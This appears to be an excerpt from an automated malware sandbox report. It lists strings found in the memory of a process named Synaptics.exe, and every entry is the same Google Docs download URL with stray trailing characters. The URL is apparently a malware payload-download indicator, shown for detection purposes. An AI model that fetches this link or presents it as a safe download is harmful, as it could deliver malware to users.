                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&b
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&x
                              Source: Synaptics.exe, 00000004.00000003.2154935594.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(G
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(b
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(d
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(r
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(z
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)A
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-b
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-c
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-x
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.a
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.u
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.uv/
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/M
                              Source: Synaptics.exe, 00000004.00000003.2154935594.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download08b
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0c
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0cY
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0p
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1B
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1H
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2I
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2Z
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5C
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5a
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5c
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7G
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7zi
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8_X
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8a
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8b
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8u
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9I
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:-
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:F
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:M
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;DY
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;r
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=A
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=u
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?c
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAA
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAb
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAx?
                              Source: Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBa
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBc
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCM
                              Source: Synaptics.exe, 00000004.00000003.2154935594.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD;
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDc
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDs)
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEH8
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFI=
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGB
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGa
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH8:
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHcq
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHp
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIB
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIa
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIc
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154935594.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKG
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKJ
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKb
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKz5
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLb
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLx2
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMC
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMI
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2408827318.000000000EF0C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNF
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNM
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOC(
